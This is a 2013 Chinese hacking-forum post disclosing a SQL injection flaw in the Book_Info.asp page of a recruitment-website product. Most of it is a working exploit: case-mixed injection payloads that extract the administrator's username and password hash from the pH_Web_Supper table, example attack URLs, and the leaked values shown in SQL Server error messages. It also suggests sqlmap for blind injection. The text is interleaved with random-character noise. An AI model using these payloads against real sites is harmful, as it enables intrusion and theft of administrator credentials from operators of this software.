找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2181|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp
3 B, n( T+ F3 @* s$ Y9 g3 c" \" g
+ j  ]+ r1 U/ F4 V& O此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出( c8 Y; _. ~4 D* |# i( U! e
# f7 X9 }+ j% J! {
exp:如下+ e6 \" ~& d$ E0 C
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
) y( o! F, J+ {6 X& v# M4 t, ~5 @& E查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)6 O2 x# L" @7 f* |% I
6 n4 s) j5 `9 M  {
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
% T  N( u( n9 o6 ^% s# N7 X : t+ t, x6 _$ Z' N
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
, ~& \. x2 X5 R% l" { + D% ~0 J) J6 w7 T$ P3 J- K
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
3 S! T  N/ l8 g( F0 D ; v( A, g0 S' Z$ ]9 i# \, F6 ]
/Educate/Book_Info.asp,行 83 K# n  e5 w; t& V( k1 Z! z

% X  A0 h4 Z% ?! S9 ~/ vhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
4 ]; S0 m* b  R
% C5 W0 o/ [& g! b+ v/ mMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'$ d: \3 k7 [' F" ]) a1 s1 n3 j& d
# C7 W8 ?% L) _- f* Z: M, t
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
% \6 [& L6 T: k% ]' f 7 Z1 [+ W4 R  U2 E7 Y9 i0 W$ o
/Educate/Book_Info.asp,行 8
5 ^$ G# X6 T9 m0 n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表